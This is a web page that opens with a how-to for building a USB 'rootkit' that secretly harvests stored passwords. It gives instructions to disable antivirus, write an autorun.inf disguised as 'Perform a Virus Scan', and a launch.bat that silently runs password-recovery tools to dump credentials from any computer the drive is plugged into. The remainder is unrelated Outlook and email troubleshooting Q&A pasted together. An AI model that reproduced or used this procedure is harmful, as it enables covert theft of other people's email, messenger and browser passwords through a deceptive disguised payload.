How to Sniff Passwords Using USB Drive ...

How to Sniff Passwords Using USB Drive

As we all know, Windows stores most of the passwords which are used on a daily basis, including instant messenger passwords such as MSN, Yahoo, AOL, Windows messenger etc. Along with these, Windows also stores passwords of Outlook Express, SMTP, POP, FTP accounts and auto-complete passwords of many browsers like IE and Firefox. There exists many tools for recovering these passswords from their stored places. Using these tools and an USB pendrive you can create your own rootkit to sniff passwords from any computer. We need the following tools to create our rootkit.

MessenPass: Recovers the passwords of most popular Instant Messenger programs: MSN Messenger, Windows Messenger, Yahoo Messenger, ICQ Lite 4.x/2003, AOL Instant Messenger provided with Netscape 7, Trillian, Miranda, and GAIM.
Mail PassView: Recovers the passwords of the following email programs: Outlook Express, Microsoft Outlook 2000 (POP3 and SMTP Accounts only), Microsoft Outlook 2002/2003 (POP3, IMAP, HTTP and SMTP Accounts), IncrediMail, Eudora, Netscape Mail, Mozilla Thunderbird, Group Mail Free.
Mail PassView can also recover the passwords of Web-based email accounts (HotMail, Yahoo!, Gmail), if you use the associated programs of these accounts.
IE Passview: IE PassView is a small utility that reveals the passwords stored by Internet Explorer browser. It supports the new Internet Explorer 7.0, as well as older versions of Internet explorer, v4.0 – v6.0
Protected Storage PassView: Recovers all passwords stored inside the Protected Storage, including the AutoComplete passwords of Internet Explorer, passwords of Password-protected sites, MSN Explorer Passwords, and more…
PasswordFox: PasswordFox is a small password recovery tool that allows you to view the user names and passwords stored by Mozilla Firefox Web browser. By default, PasswordFox displays the passwords stored in your current profile, but you can easily select to watch the passwords of any other Firefox profile. For each password entry, the following information is displayed: Record Index, Web Site, User Name, Password, User Name Field, Password Field, and the Signons filename.
Here is a step by step procedre to create the password hacking toolkit.
NOTE: You must temporarily disable your antivirus before following these steps.
1. Download all the 5 tools, extract them and copy only the executables(.exe files) into your USB Pendrive.
ie: Copy the files – mspass.exe, mailpv.exe, iepv.exe, pspv.exe and passwordfox.exe into your USB Drive.
2. Create a new Notepad and write the following text into it
ACTION= Perform a Virus Scan

save the Notepad and rename it from
New Text Document.txt to autorun.inf
Now copy the autorun.inf file onto your USB pendrive.
3. Create another Notepad and write the following text onto it.
start mspass.exe /stext mspass.txt
start mailpv.exe /stext mailpv.txt
start iepv.exe /stext iepv.txt
start pspv.exe /stext pspv.txt
start passwordfox.exe /stext passwordfox.txt
save the Notepad and rename it from
New Text Document.txt to launch.bat
Copy the launch.bat file also to your USB drive.
Now your rootkit is ready and you are all set to sniff the passwords. You can use this pendrive on on any computer to sniff the stored passwords. Just follow these steps
1. Insert the pendrive and the autorun window will pop-up. (This is because, we have created an autorun pendrive).
2. In the pop-up window, select the first option (Perform a Virus Scan).
3. Now all the password recovery tools will silently get executed in the background (This process takes hardly a few seconds). The passwords get stored in the .TXT files.
4. Remove the pendrive and you’ll see the stored passwords in the .TXT files.
This hack works on Windows 2000, XP and Vista
NOTE: This procedure will only recover the stored passwords (if any) on the Computer.

Microsoft Web Access won't send mail

If you are trying to send or receive an email in Microsoft Outlook and the password doesn't work, you can check a number of different things. Microsoft Outlook validates your email account with your email provider using various settings. Once it has validated your settings, it will send or receive email. It is not only useful to set up your email correctly but essential if you wish to use Microsoft Outlook.

Gather all of the email settings for your email account. These will be located on your email provider's website in an FAQ or support section. If in doubt contact your email provider to provide all of the settings. Look for any of the following terms: POP, SMTP, IMAP, SSL, SPA, server, and port number. Make a note of all of these. Determine when the problem exists. Check if the problem occurs when sending an email, receiving an email, or both. If the password error only happens with either sending or receiving, this narrows down the source of the problem. Click "Start," type "Outlook" and press "Enter" to open Microsoft Outlook. Click "File > Info > Account Settings." Select your email account and click "Change." Click the "Incoming mail server" field, if your error was when receiving email but not sending. Enter the full "incoming mail server" address as provided by your email provider. If your email is "IMAP" then change the "Account Type" to display "IMAP." Click "More Settings > Advanced." Make sure that the incoming server "Port" number is the same as your email provider stipulates. If your provider requires SSL, then click "This server requires an encrypted connection (SSL)." Click "OK." Click the "Outgoing mail server" field, if your error was when sending email. Enter the full outgoing server address. Click "More Settings > Advanced." Make sure the "Outgoing server" port is correctly set. If your email provider requires encryption, then select the correct type from the drop-down menu. Click "OK." Click the "password" field and make sure you have entered the correct password. If your mail provider requires "SPA," then click the "Require logon using Secure Password Authentication (SPA)" to enable it. Click "Next" and then "Finish." Your password should now work. Hope it helps.

Cannot send emails after installing norton internet security 2011

After installing NIS 2011 did you run live update repeatedly (rebooting as requested) until it reported there are no more updates?

What ports ports is Outlook configured to use? You can find this information from Outlook > Tools > Account Settings. You will find one or more accounts listed, double click the one associated with your email account. Then click the More Settings button and select the Advanced tab. There will be a port number listed for incoming and outgoing server which is what I need.

Then you can just cancel out of the window and close all of the settings dialogs.

NIS only scans email using the standard ports 25 & 110.

Try going to Settings > Network Settings > Email Antivirus Scan. What boxes are checked here? You should have pretty much all of the boxes checked including "Protect Against Timeouts" near the bottom of the window. If the timeouts option is not checked try checking this then click Apply / OK and see if the problem still occurs. If this box is already checked then try "unchecking" Scan incoming email" option and see if you can now receive email. If you are able to receive email at this point go back to the Settings window and check the "scan incoming email" option and see if you can receive email.

If this does not help, from Network Settings click the Configure button next to Client integration. You should see the Outlook box checked on the top and Outlooks Contacts List on the bottom. Try unchecking these options, apply changes and then go back into Settings and check the boxes again, and then apply the changes. Now restart Outlook. Can you receive email now?

Also, lets double check that Windows Defender did not turn itself ON which could cause interference with NIS. From the Windows start menu type "windows defender" in the search box and hit Return. It should report that Windows Defender is OFF and if so just close the dialog.

Finally, if still not working let's go ahead and run Office Diagnostics. From the MS Office program group (start menu) there should be a Tools folder. Run the Office Diagnostic tool there and see if any problems are found with Outlook.

Let me know what happens

I cant send an email from outlook it keep saying 530 authentication required

This error indicates that sending mail via your mail server requires a username and password (this is not the default setting).

Check with your mail providor for the proper settings for sending e-mail.

This is a common issue and will very likely be documented on their suport web page. You did not mention which version of Outlook. If you have Outlook 2003 or even 2007, see th following tuturial and pay attention to slide 16 &17 as this is how to enable outgoing authentication.

Hope this helps,

To send mail from Zoom browser you need a mail client for example Outlook, outlook express or Lotus notes installed and configured in your system and set that mail client to default mail application in your system.

MY EMAIL ACCOUNT RECEIVES EMAIL, BUT I CANNOT SEND EMAILS. WHEN I ATTEMPT TO SEND, I GET THIS ERROR MESSAGE: ----The server does not support a SSL connection. Account: 'Microsoft Mail Server', Server:...

It seems that there is some problem with your settings. Goto account settings-> select the email account -> advanced settings of Outgoing server tab. Removing the check mark present near something like "SSL connection". save it and try again. Also verify other ports and outgoing server address by checking with your email provider.
i hope this is helpful to you

I can't send emails via Hotmail/Outlook express

1.check whther your HTML outgoing mail settings are correct
2.check whther your recipients are HTML capable.
3.Here are some factors that might affect the sending of messages through e-mail clients:
a. You may be using the Incorrect SMTP settings.
b. Your firewall software is blocking your e-mail client or the port for outgoing messages (Port 25) is being blocked by your security software.
c. Your router has a firmware setting to block certain communication ports (specifically port 25).
d. Your ISP has blocked access to port 25.
I also suggest using port 587 instead of port 25. This will help you to get around any blocks set up on port 25.
Moreover, to retain your messages on Hotmail server, check the option to leave a copy of my messages on the server on Outlook Express. For assistance, you can visit this link to contact their support team:
